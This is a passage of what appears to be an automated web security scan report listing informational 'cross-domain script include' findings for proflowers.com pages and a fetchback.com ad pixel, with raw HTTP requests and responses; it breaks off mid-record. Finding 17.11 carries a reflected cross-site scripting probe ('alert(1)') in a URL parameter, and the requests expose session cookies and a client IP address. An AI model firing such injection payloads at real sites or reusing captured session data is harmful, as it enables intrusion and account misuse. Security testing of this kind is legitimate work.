                               <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td class="OPLeftColumn" valign="top" style="width:577px;">
                               
                               
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/giftoptionspage.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<div id="FaqOuterContainer" ><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx?flexShown=False&deliveryon=True&scAddItem=true&tile=hmpg_carousel&trackingpgroup=HPC&op=new&quantity=1&Ref=HomeNoRef&deliverydate=5%2f25%2f2011&pid=30050137&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=428685
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253AM232-NEWDELUXEMOTHERSDAYBQT%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:21 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx?aspxerrorpath=/OrderProcess/GiftOptions.aspx HTTP/1.1
Host: orders.proflowers.com
Connection: keep-alive
Referer: https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx?flexShown=False&scAddItem=true&tile=hmpg_podA&trackingpgroup=PBS&op=new&quantity=1&Ref=HomeNoRef&deliveryon=True&deliverydate=5%2f24%2f2011&pid=30003767&ssid=27&COBRAND=pfc&ShowGiftOptions=True&flexChosen=False&selectedrelationshipID=168084
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253AProduct%25253APLA7139-8%252522PeaceLily(Sympathy)%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AWebForm_DoPostBackWithOptions(newWebForm_PostBackOptions(%252522productD%2526oidt%253D2%2526ot%253DIMAGE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:17 GMT
Content-Length: 22986


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <head id="Head1"><link href='https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/stylesheets/orderprocesspfcde
...[SNIP]...
<META HTTP-EQUIV="Refresh" CONTENT="1740;URL=http://www.proflowers.com/">
       <script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<td>
       

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/orderprocessoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
* http://www.opinionlab.com
-->

<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine_pr.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="https://a248.e.akamai.net/7/248/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_enginered.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.9. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902899_11051:0_13981:207837_13479:207837_15758:367170_12704:367170_4895:795355_10164:1159631_10638:1159631_10640:1159631_10641:1159631_1437:1159631_1660:1723227; uid=1_1304902899_1303179323923:6792170478871670; kwd=1_1304902899_12936:207837_11317:1159631_11717:1159631_11718:1159631_11719:1159631; sit=1_1304902899_3006:34:0_3455:207837:207837_2988:430117:395946_3801:542560:542140_1714:827093:795355_3306:1054719:367170_719:1160458:1159631_2451:1211327:1206227_3236:1369290:1369172_782:1723576:1723227; cre=1_1304902899_29802:59536:1:541928_29805:59534:1:542589; bpd=1_1304902899_1ZCU5:4QNG; apd=1_1304902899; scg=1_1304902899; ppd=1_1304902899; afl=1_1304902899

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:08:51 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1304903331_13521:0_11051:0_11051:432_13981:208269_13479:208269_15758:367602_12704:367602_4895:795787_10164:1160063_10638:1160063_10640:1160063_10641:1160063_1437:1160063_1660:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: uid=1_1304903331_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: kwd=1_1304903331_12936:208269_11317:1160063_11717:1160063_11718:1160063_11719:1160063; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: sit=1_1304903331_3006:466:0_3455:208269:208269_2988:430549:396378_3801:542992:542572_1714:827525:795787_3306:1055151:367602_719:1160890:1160063_2451:1211759:1206659_3236:1369722:1369604_782:1724008:1723659; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: cre=1_1304903331_29802:59536:1:542360_29805:59534:1:543021; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: bpd=1_1304903331_1ZunS:0_1ZCU5:4QUE; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: apd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: scg=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: ppd=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Set-Cookie: afl=1_1304903331; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:08:51 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:08:51 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2321

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- "1800Flowers" c/o "FetchBack", segment: '1800Flowers Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js"></script>
...[SNIP]...
<img src="http://at.amgdgt.com/ads/?t=pp&px=15038&rnd=$timestamp" width="1" height="1" border="0"/>
<script src="http://ad.adtegrity.net/pixel?id=972818&t=1" type="text/javascript"></script>
...[SNIP]...
17.10. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.11. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 